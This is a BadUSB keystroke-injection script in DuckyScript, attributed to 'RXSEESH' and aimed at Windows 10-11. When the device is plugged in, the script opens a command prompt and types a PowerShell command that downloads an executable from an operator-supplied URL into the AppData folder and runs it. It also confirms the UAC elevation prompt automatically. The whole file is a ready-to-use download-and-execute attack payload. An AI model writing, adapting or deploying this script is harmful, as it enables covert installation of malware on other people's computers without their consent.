# This script downloading file on pc & execute it
# If BadUSB does not work for you - Transfer the device to DeepSleep
# and then try to enable and run the script again.

REM ############################################
REM # Title    : DOWNLOAD & EXECUTE FILE       |
REM # Author   : RXSEESH                       |
REM # Version  : PRIVATE & FIXED V1.1          |
REM # Category : EXECUTION                     |
REM # Target   : WINDOWS 10-11                 |
REM ############################################
REM   @guns.lol/RXSEESH | @github.com/RXSEESH
GUI r
DELAY 550
STRING cmd
DELAY 350
ENTER
DELAY 800
STRING powershell -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls; iwr -Uri 'YOUR_URL' -OutFile \"$env:APPDATA\file.exe\"; Start-Process \"$env:APPDATA\file.exe\""
DELAY 800
ENTER
DELAY 8000
ALT y
ENTER
STRING exit
DELAY 800
ENTER
